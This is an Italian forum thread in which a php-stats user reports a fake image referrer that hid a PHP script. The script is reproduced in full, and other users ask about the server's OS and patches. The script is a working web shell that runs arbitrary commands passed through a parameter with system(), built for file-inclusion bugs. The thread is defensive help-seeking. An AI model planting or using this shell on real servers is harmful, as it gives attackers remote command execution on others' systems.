Attacco hacker?

[frateralph]

Utilizzo come contatore di statistiche php-stats.

Ho trovato come referrer una finta immagine che nascondeva questo script:

codice:

<font face="Comic Sans MS" size="2"><center>
CMD - System Command

</center></font><font face="Verdana" size="1"></center>

# CMD PHP Injection: 

# Edit Ulang oleh : Lanzhit

# DALnet Best Server in The World




<hr color="red" width=751px height=115px>


<pre><font face="Verdana" size="1">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>


<hr color="red" width=751px height=115px>


<font face="Verdana" size="1">« !!! NOME HACKER !!!   » 
@  îrç.Ðå£.ñët #Pemangkat

Ho omesso il nome dell'autore dello script, nome conosciuto come hacker.
Non vedo danni apparenti. Ci potrebbero essere stati?

Dalle statistiche risulta:
Windows 98 Explorer 5 ? 69.88.24.217
Lingua: Indonesiano
Host: IP-69-88-24-217.HAWAIITELEPORT.COM

[Cesar]

Attacco hacker?

penso proprio di si...

[makuro]

Bhe, per il discorso se c'è stato danno, è importante sapere il tuo sistema operativo e il suo livello di patch applicate.
Usi IIS, Apache? Patchati?

Cosa intendi per finta immagine? qualchecosa.jpg.exe?

Ciao,
Roberto.